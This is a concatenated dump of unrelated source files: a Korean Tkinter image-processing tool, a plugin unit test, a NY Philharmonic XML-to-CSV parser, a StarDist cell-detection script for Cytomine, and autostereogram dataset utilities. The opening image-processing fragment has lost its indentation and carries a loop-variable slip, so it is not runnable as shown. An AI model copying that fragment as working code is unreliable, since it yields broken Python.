outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
## 영상의 평균 구하기.
sumList = []
for RGB in range(3):
sumList.append(0)
for i in range(inImage.H):
for k in range(inImage.W):
sumList[RGB] += inImage.mem[RGB][i][k]
avg = [s // (inImage.W * inImage.H) for s in sumList]
for i in range(inImage.H):
for k in range(inImage.W):
avgVal = int(sum([inImage.mem[tmp][i][k] for tmp in range(3)]) / 3)
if avgVal > avg[RGB]:
newVal = 255
else:
newVal = 0
for RGB in range(3):
outImage.mem[RGB][i][k] = newVal
window.outImage = outImage
displayImageColor(window)
# 영상 축소 알고리즘 (평균변환)
def zoomOutImage2Color(window):
scale = askinteger("축소", "값-->", minvalue=2, maxvalue=16)
inImage = window.inImage
## 중요! 코드. 출력영상 크기 결정 ##
outH = inImage.H//scale
outW = inImage.W//scale
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i//scale][k//scale] += inImage.mem[RGB][i][k]
for i in range(outImage.H):
for k in range(outImage.W):
outImage.mem[RGB][i][k] //= (scale*scale)
window.outImage = outImage
displayImageColor(window)
# 영상 확대 알고리즘 (양선형 보간)
def zoomInImage2Color(window):
scale = askinteger("확대", "값-->", minvalue=2, maxvalue=8)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H*scale
outW = inImage.W*scale
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
rH, rW, iH, iW = [0] * 4 # 실수위치 및 정수위치
x, y = 0, 0 # 실수와 정수의 차이값
C1,C2,C3,C4 = [0] * 4 # 결정할 위치(N)의 상하좌우 픽셀
for RGB in range(3):
for i in range(outH):
for k in range(outW):
rH = i / scale
rW = k / scale
iH = int(rH)
iW = int(rW)
x = rW - iW
y = rH - iH
if 0 <= iH < inH-1 and 0 <= iW < inW-1 :
C1 = inImage.mem[RGB][iH][iW]
C2 = inImage.mem[RGB][iH][iW+1]
C3 = inImage.mem[RGB][iH+1][iW+1]
C4 = inImage.mem[RGB][iH+1][iW]
newValue = C1*(1-y)*(1-x) + C2*(1-y)* x+ C3*y*x + C4*y*(1-x)
outImage.mem[RGB][i][k] = int(newValue)
window.outImage = outImage
displayImageColor(window)
# 영상 회전 알고리즘
def rotateImageColor(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
radian = angle * math.pi / 180
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
xs = i
ys = k
xd = int(math.cos(radian) * xs - math.sin(radian) * ys)
yd = int(math.sin(radian) * xs + math.cos(radian) * ys)
if 0 <= xd < inImage.H and 0 <= yd < inImage.W:
outImage.mem[RGB][xd][yd] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
# 영상 회전 알고리즘 - 중심, 역방향
def rotateImage2Color(window):
angle = askinteger("회전", "값-->", minvalue=1, maxvalue=360)
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
radian = angle * math.pi / 180
cx = inW//2
cy = inH//2
for RGB in range(3):
for i in range(outH) :
for k in range(outW) :
xs = i
ys = k
xd = int(math.cos(radian) * (xs-cx) - math.sin(radian) * (ys-cy)) + cx
yd = int(math.sin(radian) * (xs-cx) + math.cos(radian) * (ys-cy)) + cy
if 0 <= xd < outH and 0 <= yd < outW:
outImage.mem[RGB][xs][ys] = inImage.mem[RGB][xd][yd]
else:
outImage.mem[RGB][xs][ys] = 255
window.outImage = outImage
displayImageColor(window)
## 엠보싱 처리
def embossImageRGB(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
inH = inImage.H
inW = inImage.W
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
MSIZE = 3
mask = [ [-1, 0, 0],
[ 0, 0, 0],
[ 0, 0, 1] ]
## 임시 입력영상 메모리 확보
tmpInImage = InImage(H=inH + MSIZE - 1, W=inW + MSIZE - 1)
tmpInImage.malloc(initValue=127)
tmpOutImage = OutImage(H=outH, W=outW)
tmpOutImage.malloc()
## 원 입력 --> 임시 입력
for RGB in range(3):
for i in range(inH):
for k in range(inW):
tmpInImage.mem[RGB][i+MSIZE//2][k+MSIZE//2] = inImage.mem[RGB][i][k]
## 회선연산
for i in range(MSIZE//2, inH + MSIZE//2):
for k in range(MSIZE//2, inW + MSIZE//2):
# 각 점을 처리.
S = 0.0
for m in range(0, MSIZE):
for n in range(0, MSIZE):
S += mask[m][n]*tmpInImage.mem[RGB][i+m-MSIZE//2][k+n-MSIZE//2]
tmpOutImage.mem[RGB][i-MSIZE//2][k-MSIZE//2] = S
## 127 더하기 (선택)
for i in range(outH):
for k in range(outW):
tmpOutImage.mem[RGB][i][k] += 127
## 임시 출력 --> 원 출력
for i in range(outH):
for k in range(outW):
value = tmpOutImage.mem[RGB][i][k]
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage.mem[RGB][i][k] = int(value)
window.outImage = outImage
displayImageColor(window)
####################
#### 메인 코드부 ###
####################
if __name__ == "__main__":
win = Window(H=500, W=500)
win.geometry("500x500")
win.title("컴퓨터 비전(딥러닝 기법) ver 0.04")
can = Canvas(win)
win.canvas = can
pap = Paper(can)
can.paper = pap
inImage = InImage()
win.inImage = inImage
outImage = OutImage()
win.outImage = outImage
status = Label(win, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(win)
win.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="파일", menu=fileMenu)
fileMenu.add_command(label="파일 열기", command=lambda: openImageColor(win))
fileMenu.add_separator()
fileMenu.add_command(label="파일 저장", command=lambda: saveImageColor(win))
comVisionMenu1 = Menu(mainMenu)
mainMenu.add_cascade(label="화소점 처리", menu=comVisionMenu1)
comVisionMenu1.add_command(label="덧셈/뺄셈", command=lambda: addImageColor(win))
comVisionMenu1.add_command(label="반전하기", command=lambda: revImageColor(win))
comVisionMenu1.add_command(label="파라볼라", command=lambda: paraImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="모핑", command=lambda: morphImageColor(win))
comVisionMenu1.add_separator()
comVisionMenu1.add_command(label="채도조절(Pillow)", command=lambda: addSValuePillow(win))
comVisionMenu1.add_command(label="채도조절(HSV)", command=lambda: addSValueHSV(win))
comVisionMenu2 = Menu(mainMenu)
mainMenu.add_cascade(label="통계", menu=comVisionMenu2)
comVisionMenu2.add_command(label="이진화", command=lambda: bwImage(win))
comVisionMenu2.add_command(label="축소(평균변환)", command=lambda: zoomOutImage2Color(win))
comVisionMenu2.add_command(label="확대(양선형보간)", command=lambda: zoomInImage2Color(win))
comVisionMenu2.add_separator()
# comVisionMenu2.add_command(label="히스토그램", command=histoImage)
# comVisionMenu2.add_command(label="히스토그램(내꺼)", command=histoImage2)
# comVisionMenu2.add_command(label="명암대비", command=stretchImage)
# comVisionMenu2.add_command(label="End-In탐색", command=endinImage)
# comVisionMenu2.add_command(label="평활화", command=equalizeImage)
comVisionMenu3 = Menu(mainMenu)
mainMenu.add_cascade(label="기하학 처리", menu=comVisionMenu3)
# comVisionMenu3.add_command(label="상하반전", command=upDownImageColor)
# comVisionMenu3.add_command(label="이동", command=moveImage)
# comVisionMenu3.add_command(label="축소", command=zoomOutImageColor)
# comVisionMenu3.add_command(label="확대", command=zoomInImageColor)
comVisionMenu3.add_command(label="회전1", command=lambda: rotateImageColor(win))
comVisionMenu3.add_command(label="회전2(중심,역방향)", command=lambda: rotateImage2Color(win))
comVisionMenu4 = Menu(mainMenu)
mainMenu.add_cascade(label="화소영역 처리", menu=comVisionMenu4)
comVisionMenu4.add_command(label="엠보싱(RGB)", command=lambda: embossImageRGB(win))
# comVisionMenu4.add_command(label="엠보싱(Pillow제공)", command=embossImagePillow)
# comVisionMenu4.add_command(label="엠보싱(HSV)", command=embossImageHSV)
# comVisionMenu4.add_separator()
# comVisionMenu4.add_command(label="블러링(RGB)", command=blurrImageRGB)
#
# comVisionMenu5 = Menu(mainMenu)
# mainMenu.add_cascade(label="기타 입출력", menu=comVisionMenu5)
# comVisionMenu5.add_command(label="MySQL에서 불러오기", command=loadMysql)
# comVisionMenu5.add_command(label="MySQL에 저장하기", command=saveMysql)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="CSV 열기", command=openCSV)
# comVisionMenu5.add_command(label="CSV로 저장", command=saveCSV)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="엑셀 열기", command=openExcel)
# comVisionMenu5.add_command(label="엑셀로 저장", command=saveExcel)
# comVisionMenu5.add_command(label="엑셀 아트로 저장", command=saveExcelArt)
win.mainloop()
``` |
{
"source": "Jiung-Wen/q2-composition",
"score": 2
} |
#### File: q2_composition/tests/test_plugin_setup.py
```python
import unittest
from q2_composition.plugin_setup import plugin as composition_plugin
class PluginSetupTests(unittest.TestCase):
def test_plugin_setup(self):
self.assertEqual(composition_plugin.name, 'composition')
``` |
{
"source": "jiunsiew/NY_Philarchive_performanceHistory",
"score": 3
} |
#### File: NY_Philarchive_performanceHistory/Scripts/transform_xml_to_df.py
```python
from __future__ import division
# from sys import argv
import re
# from collections import Counter
# from sets import Set
# import matplotlib.pyplot as plt
import xml.etree.ElementTree as ET
import os
import os.path
import pandas as pd
os.chdir('/Users/jiun/Documents/analytics/NY_Philarchive_performanceHistory/Programs')
#create xml collection of "docs" (i.e., programs in NYPhil's definition)
tree = ET.parse('complete.xml')
root = tree.getroot()
concerts = root.findall('program')
#convert season listing (e.g., 1842-43) to a single leading year (1842)
def simplify_date(hyphenated_season):
simple_season = re.sub(r'(\d{4})-\d{2}',r'\1',hyphenated_season)
return simple_season
def clean_date(date_string):
tmp = re.search('^\d{4}-\d{2}-\d{2}', date_string)
return date_string[tmp.start():tmp.end()]
#get the composer's last name only from the worksComposerTitle elements
def get_name(work):
composer_name = re.sub(r'(.*?)(,| \[).*',r'\1',work)
composer_name = re.sub(r"(.*)'(.*)",r"\1\\'\2",composer_name)
return composer_name
def extract_text(obj):
if obj is None:
return 'NA'
else:
return obj.text
#gather info from XML file
all_seasons = []
composers = []
current_season = '1842'
total_works = 0
# create a long table with the following columns:
# programID, date,Time, eventType, Location, Venue, composerName, workTitle, conductorName
for c in concerts:
# season = simplify_date(c.find('season').text)
programID = c.find('programID').text
# concert info
concertInfo = c.find('concertInfo')
date = clean_date(concertInfo.find('Date').text)
time = concertInfo.find('Time').text
eventType = concertInfo.find('eventType').text
location = concertInfo.find('Location').text
venue = concertInfo.find('Venue').text
# work info
# stopped here: need to handle the case where there are
workInfo = c.find('worksInfo')
for w in workInfo.findall('work'):
composer = extract_text(w.find('composerName'))
title = extract_text(w.find('workTitle'))
conductor = extract_text(w.find('conductorName'))
row = [programID, date, time, eventType, location, venue, composer, title] #, conductor]
all_seasons.append(row)
# convert to a data frame
output_df = pd.DataFrame(all_seasons,
columns = ['programID',
'date',
'Time',
'eventType',
'Location',
'Venue',
'composerName',
'workTitle'])
output_df.to_csv('NY_Philharmonic_df.csv', sep = '|', encoding = 'utf-8')
``` |
{
"source": "jiunyen-ching/S_CellDetect_Stardist_HE_ROI",
"score": 2
} |
#### File: jiunyen-ching/S_CellDetect_Stardist_HE_ROI/run.py
```python
from __future__ import print_function, unicode_literals, absolute_import, division
import sys
import numpy as np
import os
from shapely.geometry import shape, box, Polygon,Point
from shapely import wkt
from glob import glob
from tifffile import imread
from csbdeep.utils import Path, normalize
from stardist import random_label_cmap
from stardist.models import StarDist2D
from cytomine import cytomine, models, CytomineJob
from cytomine.models import Annotation, AnnotationTerm, AnnotationCollection, ImageInstanceCollection, Job
from PIL import Image
import argparse
import json
import logging
__author__ = "<NAME> <<EMAIL>>"
def main(argv):
with CytomineJob.from_cli(argv) as conn:
conn.job.update(status=Job.RUNNING, progress=0, statusComment="Initialization...")
# base_path = "{}".format(os.getenv("HOME")) # Mandatory for Singularity
base_path = "/home/mmu/Desktop"
working_path = os.path.join(base_path,str(conn.job.id))
#Loading pre-trained Stardist model
np.random.seed(17)
lbl_cmap = random_label_cmap()
#Stardist H&E model downloaded from https://github.com/mpicbg-csbd/stardist/issues/46
#Stardist H&E model downloaded from https://drive.switch.ch/index.php/s/LTYaIud7w6lCyuI
model = StarDist2D(None, name='2D_versatile_HE', basedir='/models/') #use local model file in ~/models/2D_versatile_HE/
#Select images to process
images = ImageInstanceCollection().fetch_with_filter("project", conn.parameters.cytomine_id_project)
list_imgs = []
if conn.parameters.cytomine_id_images == 'all':
for image in images:
list_imgs.append(int(image.id))
else:
list_imgs = [int(id_img) for id_img in conn.parameters.cytomine_id_images.split(',')]
#Go over images
for id_image in conn.monitor(list_imgs, prefix="Running detection on image", period=0.1):
#Dump ROI annotations in img from Cytomine server to local images
#conn.job.update(status=Job.RUNNING, progress=0, statusComment="Fetching ROI annotations...")
roi_annotations = AnnotationCollection()
roi_annotations.project = conn.parameters.cytomine_id_project
roi_annotations.term = conn.parameters.cytomine_id_roi_term
roi_annotations.image = id_image #conn.parameters.cytomine_id_image
roi_annotations.showWKT = True
roi_annotations.fetch()
print(roi_annotations)
#Go over ROI in this image
#for roi in conn.monitor(roi_annotations, prefix="Running detection on ROI", period=0.1):
for roi in roi_annotations:
#Get Cytomine ROI coordinates for remapping to whole-slide
#Cytomine cartesian coordinate system, (0,0) is bottom left corner
print("----------------------------ROI------------------------------")
roi_geometry = wkt.loads(roi.location)
print("ROI Geometry from Shapely: {}".format(roi_geometry))
print("ROI Bounds")
print(roi_geometry.bounds)
minx=roi_geometry.bounds[0]
miny=roi_geometry.bounds[3]
#Dump ROI image into local PNG file
roi_path=os.path.join(working_path,str(roi_annotations.project)+'/'+str(roi_annotations.image)+'/'+str(roi.id))
roi_png_filename=os.path.join(roi_path+'/'+str(roi.id)+'.png')
print("roi_png_filename: %s" %roi_png_filename)
roi.dump(dest_pattern=roi_png_filename,mask=True,alpha=True)
#roi.dump(dest_pattern=os.path.join(roi_path,"{id}.png"), mask=True, alpha=True)
#Stardist works with TIFF images without alpha channel, flattening PNG alpha mask to TIFF RGB
im=Image.open(roi_png_filename)
bg = Image.new("RGB", im.size, (255,255,255))
bg.paste(im,mask=im.split()[3])
roi_tif_filename=os.path.join(roi_path+'/'+str(roi.id)+'.tif')
bg.save(roi_tif_filename,quality=100)
X_files = sorted(glob(roi_path+'/'+str(roi.id)+'*.tif'))
X = list(map(imread,X_files))
n_channel = 3 if X[0].ndim == 3 else X[0].shape[-1]
axis_norm = (0,1) # normalize channels independently (0,1,2) normalize channels jointly
if n_channel > 1:
print("Normalizing image channels %s." % ('jointly' if axis_norm is None or 2 in axis_norm else 'independently'))
#Going over ROI images in ROI directory (in our case: one ROI per directory)
for x in range(0,len(X)):
print("------------------- Processing ROI file %d: %s" %(x,roi_tif_filename))
img = normalize(X[x], conn.parameters.stardist_norm_perc_low, conn.parameters.stardist_norm_perc_high, axis=axis_norm)
#Stardist model prediction with thresholds
labels, details = model.predict_instances(img,
prob_thresh=conn.parameters.stardist_prob_t,
nms_thresh=conn.parameters.stardist_nms_t)
print("Number of detected polygons: %d" %len(details['coord']))
cytomine_annotations = AnnotationCollection()
#Go over detections in this ROI, convert and upload to Cytomine
for pos,polygroup in enumerate(details['coord'],start=1):
#Converting to Shapely annotation
points = list()
for i in range(len(polygroup[0])):
#Cytomine cartesian coordinate system, (0,0) is bottom left corner
#Mapping Stardist polygon detection coordinates to Cytomine ROI in whole slide image
p = Point(minx+polygroup[1][i],miny-polygroup[0][i])
points.append(p)
annotation = Polygon(points)
#Append to Annotation collection
cytomine_annotations.append(Annotation(location=annotation.wkt,
id_image=id_image,#conn.parameters.cytomine_id_image,
id_project=conn.parameters.cytomine_id_project,
id_terms=[conn.parameters.cytomine_id_cell_term]))
print(".",end = '',flush=True)
#Send Annotation Collection (for this ROI) to Cytomine server in one http request
ca = cytomine_annotations.save()
conn.job.update(status=Job.TERMINATED, progress=100, statusComment="Finished.")
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "jiupinjia/neural-magic-eye",
"score": 2
} |
#### File: jiupinjia/neural-magic-eye/datasets.py
```python
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
import glob
import random
import stereogram as stgm
import utils
import torch
import torchvision.transforms.functional as TF
from torch.utils.data import Dataset, DataLoader, Subset
from torchvision.datasets import MNIST
import string
import qrcode
class DataAugmentation:
def __init__(self,
with_random_hflip=False,
with_random_vflip=False,
with_random_blur=False,
with_random_rotate=False,
with_random_crop=False,
with_random_aspect_ratio=False,
with_random_jpeg_compression=False):
self.with_random_hflip = with_random_hflip
self.with_random_vflip = with_random_vflip
self.with_random_blur = with_random_blur
self.with_random_rotate = with_random_rotate
self.with_random_crop = with_random_crop
self.with_random_aspect_ratio = with_random_aspect_ratio
self.with_random_jpeg_compression = with_random_jpeg_compression
def transform(self, img):
h, w = img.shape[0:2]
if self.with_random_hflip and random.random() > 0.5:
img = img[:, ::-1]
if self.with_random_vflip and random.random() > 0.5:
img = img[::-1, :]
if self.with_random_blur and random.random() > 0.5:
k = random.randint(1, int(min(h, w)/20 + 1))
img = cv2.blur(img, (k, k))
if self.with_random_rotate and random.random() > 0.5:
theta = random.uniform(-180, 180)
image_center = tuple(np.array(img.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, theta, 1.0)
img = cv2.warpAffine(img, rot_mat, img.shape[1::-1], flags=cv2.INTER_LINEAR)
if self.with_random_crop and random.random() > 0.5:
crop_h = random.uniform(h/2, h)
crop_w = random.uniform(w/2, w)
y1 = int(random.uniform(0, h-crop_h))
y2 = int(y1 + crop_h)
x1 = int(random.uniform(0, w-crop_w))
x2 = int(x1 + crop_w)
img = img[y1:y2, x1:x2]
if self.with_random_aspect_ratio and random.random() > 0.5:
target_aspect_ratio = random.uniform(3, 12)
h_new = h
w_new = int(h_new / target_aspect_ratio)
            img = cv2.resize(img, (w_new, h_new), interpolation=cv2.INTER_CUBIC)
if self.with_random_jpeg_compression and random.random() > 0.5:
img = (img * 255.).astype(np.uint8)
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), random.randint(20, 90)]
_, imgcode = cv2.imencode('.jpg', img, encode_param)
img = cv2.imdecode(imgcode, cv2.IMREAD_COLOR)
img = img.astype(np.float32) / 255.
return img
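# Usage sketch (illustrative): `img` is assumed to be an H x W (x 3) np.float32
# array scaled to [0, 1], which is what the dataset classes below pass in, e.g.
#   aug = DataAugmentation(with_random_hflip=True, with_random_blur=True)
#   img_aug = aug.transform(img)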
class SimpleMNISTDataset(Dataset):
def __init__(self, bg_tile_dir, img_size, is_train=True):
self.img_size = img_size
self.synthesizer = stgm.Stereogram(CANVAS_HEIGHT=img_size)
self.is_train = is_train
_ = MNIST(root=r'./datasets', train=True, download=True)
mnist_training_imgs, mnist_training_labels = torch.load(r'./datasets/MNIST/processed/training.pt')
mnist_testing_imgs, mnist_testing_labels = torch.load(r'./datasets/MNIST/processed/test.pt')
if is_train:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'train', '*.jpg'))
self.mnist_imgs = np.array(mnist_training_imgs, dtype=np.float32) / 255.
            self.mnist_labels = np.array(mnist_training_labels, dtype=np.int64)
self.tile_augmenter = DataAugmentation(
with_random_vflip=True, with_random_hflip=True, with_random_blur=True)
self.dmap_augmenter = DataAugmentation(with_random_blur=True)
else:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'val', '*.jpg'))
self.mnist_imgs = np.array(mnist_testing_imgs, dtype=np.float32) / 255.
            self.mnist_labels = np.array(mnist_testing_labels, dtype=np.int64)
self.tile_augmenter = DataAugmentation()
self.dmap_augmenter = DataAugmentation()
def __len__(self):
return len(self.mnist_labels)
def __getitem__(self, idx):
dmap = np.reshape(self.mnist_imgs[idx, :], [28, 28])
label = self.mnist_labels[idx]
idx = random.randint(0, len(self.bg_tiles_dirs) - 1)
bg_tile = cv2.imread(self.bg_tiles_dirs[idx], cv2.IMREAD_COLOR)
bg_tile = cv2.cvtColor(bg_tile, cv2.COLOR_BGR2RGB) / 255.
bg_tile = self.tile_augmenter.transform(bg_tile)
dmap = self.dmap_augmenter.transform(dmap)
bg_tile, dmap = self.synthesizer.normalize_height(bg_tile, dmap)
stereogram = self.synthesizer.synthesis(bg_tile, dmap)
# resize and to tensor
        stereogram = cv2.resize(stereogram, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
        dmap = cv2.resize(dmap, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
stereogram = TF.to_tensor(np.array(stereogram, dtype=np.float32))
dmap = TF.to_tensor(np.array(dmap, dtype=np.float32))
label = torch.tensor(label, dtype=torch.int)
data = {'stereogram': stereogram, 'dmap': dmap, 'label': label}
return data
class ShapeNetDataset(Dataset):
def __init__(self, depth_map_dir, bg_tile_dir, img_size, is_train=True):
self.img_size = img_size
self.is_train = is_train
if is_train:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'train', '*.jpg'))
            self.depth_map_files = np.loadtxt(os.path.join(depth_map_dir, 'train.txt'), dtype=str, delimiter=',')
self.tile_augmenter = DataAugmentation(
with_random_vflip=True, with_random_hflip=True,
with_random_blur=True, with_random_aspect_ratio=True)
self.dmap_augmenter = DataAugmentation(
with_random_vflip=True, with_random_hflip=True,
with_random_rotate=True, with_random_crop=True)
self.stereogram_augmenter = DataAugmentation(with_random_jpeg_compression=True)
else:
self.bg_tiles_dirs = glob.glob(os.path.join(bg_tile_dir, 'val', '*.jpg'))
            self.depth_map_files = np.loadtxt(os.path.join(depth_map_dir, 'val.txt'), dtype=str, delimiter=',')
self.tile_augmenter = DataAugmentation()
self.dmap_augmenter = DataAugmentation()
self.stereogram_augmenter = DataAugmentation()
self.labels = self.depth_map_files[:, 2].astype(int)
def __len__(self):
return self.depth_map_files.shape[0]
def __getitem__(self, idx):
# why CANVAS_HEIGHT is set larger than in_size?
# We want to simulate the degradation of image resize at inference time
canvas_height = int(self.img_size*random.uniform(1.0, 1.5))
synthesizer = stgm.Stereogram(CANVAS_HEIGHT=canvas_height)
dmap = cv2.imread(self.depth_map_files[idx, 0], cv2.IMREAD_GRAYSCALE)
dmap = dmap.astype(np.float32) / 255.
label = self.labels[idx]
idx = random.randint(0, len(self.bg_tiles_dirs) - 1)
bg_tile = cv2.imread(self.bg_tiles_dirs[idx], cv2.IMREAD_COLOR)
bg_tile = cv2.cvtColor(bg_tile, cv2.COLOR_BGR2RGB) / 255.
bg_tile = self.tile_augmenter.transform(bg_tile)
dmap = self.dmap_augmenter.transform(dmap)
bg_tile, dmap = synthesizer.normalize_height(bg_tile, dmap)
stereogram = synthesizer.synthesis(bg_tile, dmap)
stereogram = self.stereogram_augmenter.transform(stereogram)
# resize and to tensor
        stereogram = cv2.resize(stereogram, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
        dmap = cv2.resize(dmap, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
stereogram = TF.to_tensor(np.array(stereogram, dtype=np.float32))
dmap = TF.to_tensor(np.array(dmap, dtype=np.float32))
label = torch.tensor(label, dtype=torch.int)
data = {'stereogram': stereogram, 'dmap': dmap, 'label': label}
return data
class WatermarkingDataset(Dataset):
def __init__(self, base_canvas_dir, img_size, is_train=True):
# we use fixed texture to generate autostereogram for both training and testing
self.bg_tile = cv2.imread(r'./datasets/Textures/train/00099.jpg', cv2.IMREAD_COLOR)
self.bg_tile = cv2.cvtColor(self.bg_tile, cv2.COLOR_BGR2RGB).astype(np.float32) / 255.
self.is_train = is_train
if is_train:
self.canvas_dir = glob.glob(os.path.join(base_canvas_dir, 'train', '*.jpg'))
self.canvas_augmenter = DataAugmentation(with_random_hflip=True, with_random_crop=True, with_random_blur=True)
else:
self.canvas_dir = glob.glob(os.path.join(base_canvas_dir, 'val', '*.jpg'))
self.canvas_augmenter = DataAugmentation()
self.img_size = img_size
def __len__(self):
if self.is_train:
return 50000
else:
return 5000
def __getitem__(self, idx):
# why CANVAS_HEIGHT is set larger than in_size?
# We want to simulate the degradation of image resize at inference time
canvas_height = int(self.img_size*random.uniform(1.0, 1.5))
synthesizer = stgm.Stereogram(CANVAS_HEIGHT=canvas_height)
idx = random.randint(0, len(self.canvas_dir) - 1)
canvas = cv2.imread(self.canvas_dir[idx], cv2.IMREAD_COLOR)
canvas = cv2.cvtColor(canvas, cv2.COLOR_BGR2RGB).astype(np.float32) / 255.
canvas = self.canvas_augmenter.transform(canvas)
characters = string.ascii_letters
length = random.randint(1, 50)
random_str = ''.join([random.choice(characters) for j in range(length)])
dmap = qrcode.make(random_str)
dmap = 1 - np.array(dmap, np.float32)
bg_tile, dmap = synthesizer.normalize_height(self.bg_tile, dmap)
stereogram = synthesizer.synthesis(bg_tile, dmap)
# resize
        stereogram = cv2.resize(stereogram, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
        dmap = cv2.resize(dmap, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
        canvas = cv2.resize(canvas, (self.img_size, self.img_size), interpolation=cv2.INTER_CUBIC)
alpha = random.uniform(0.1, 0.9)
mix = alpha * stereogram + (1 - alpha) * canvas
dmap = TF.to_tensor(np.array(dmap, dtype=np.float32))
mix = TF.to_tensor(np.array(mix, dtype=np.float32))
data = {'stereogram': mix, 'dmap': dmap}
return data
def get_loaders(args):
if args.dataset == 'mnist':
training_set = SimpleMNISTDataset(
bg_tile_dir=r'./datasets/Textures', img_size=args.in_size, is_train=True)
val_set = SimpleMNISTDataset(
bg_tile_dir=r'./datasets/Textures', img_size=args.in_size, is_train=False)
elif args.dataset == 'shapenet':
training_set = ShapeNetDataset(
depth_map_dir=r'./datasets/ShapeNetCore.v2', bg_tile_dir=r'./datasets/Textures',
img_size=args.in_size, is_train=True)
val_set = ShapeNetDataset(
depth_map_dir=r'./datasets/ShapeNetCore.v2', bg_tile_dir=r'./datasets/Textures',
img_size=args.in_size, is_train=False)
elif args.dataset == 'watermarking':
training_set = WatermarkingDataset(
base_canvas_dir=r'./datasets/VGGFlowers', img_size=args.in_size, is_train=True)
val_set = WatermarkingDataset(
base_canvas_dir=r'./datasets/VGGFlowers', img_size=args.in_size, is_train=False)
else:
raise NotImplementedError(
            'Wrong dataset name %s (choose one from [mnist, shapenet, watermarking])'
% args.dataset)
datasets = {'train': training_set, 'val': val_set}
dataloaders = {x: DataLoader(datasets[x], batch_size=args.batch_size,
shuffle=True, num_workers=4)
for x in ['train', 'val']}
return dataloaders
```
#### File: jiupinjia/neural-magic-eye/utils.py
```python
import numpy as np
import matplotlib.pyplot as plt
import cv2
import random
from skimage.metrics import structural_similarity as compare_ssim  # measure.compare_ssim was removed in newer scikit-image
import torch
from torchvision import utils
def make_numpy_grid(tensor_data):
# tensor_data: b x c x h x w, [0, 1], tensor
tensor_data = tensor_data.detach()
vis = utils.make_grid(tensor_data)
vis = np.array(vis.cpu()).transpose((1,2,0))
if vis.shape[2] == 1:
vis = np.stack([vis, vis, vis], axis=-1)
return vis
def cpt_ssim(img, img_gt, normalize=False):
if normalize:
img = (img - img.min()) / (img.max() - img.min() + 1e-9)
img_gt = (img_gt - img_gt.min()) / (img_gt.max() - img_gt.min() + 1e-9)
    SSIM = compare_ssim(img, img_gt, data_range=1.0)
return SSIM
def cpt_psnr(img, img_gt, PIXEL_MAX=1.0, normalize=False):
if normalize:
img = (img - img.min()) / (img.max() - img.min() + 1e-9)
img_gt = (img_gt - img_gt.min()) / (img_gt.max() - img_gt.min() + 1e-9)
mse = np.mean((img - img_gt) ** 2)
psnr = 20 * np.log10(PIXEL_MAX / np.sqrt(mse))
return psnr
def cpt_cos_similarity(img, img_gt, normalize=False):
if normalize:
img = (img - img.min()) / (img.max() - img.min() + 1e-9)
img_gt = (img_gt - img_gt.min()) / (img_gt.max() - img_gt.min() + 1e-9)
cos_dist = np.sum(img*img_gt) / np.sqrt(np.sum(img**2)*np.sum(img_gt**2) + 1e-9)
return cos_dist
def cpt_batch_psnr(img, img_gt, PIXEL_MAX):
mse = torch.mean((img - img_gt) ** 2)
psnr = 20 * torch.log10(PIXEL_MAX / torch.sqrt(mse))
return psnr
def cpt_batch_classification_acc(predicted, target):
# predicted: b x c, logits [-inf, +inf]
pred_idx = torch.argmax(predicted, dim=1).int()
pred_idx = torch.reshape(pred_idx, [-1])
target = torch.reshape(target, [-1])
return torch.mean((pred_idx.int()==target.int()).float())
def normalize(img, mask=None, p_min=0, p_max=0):
# img: h x w, [0, 1], np.float32
if mask is None:
sorted_arr = np.sort(img, axis=None) # sort the flattened array
else:
sorted_arr = np.sort(img[mask == 1], axis=None) # sort the flattened array
n = len(sorted_arr)
img_min = sorted_arr[int(n*p_min)]
img_max = sorted_arr[::-1][int(n*p_max)]
img_norm = (img - img_min) / (img_max - img_min + 1e-6)
return np.clip(img_norm, a_min=0, a_max=1.0)
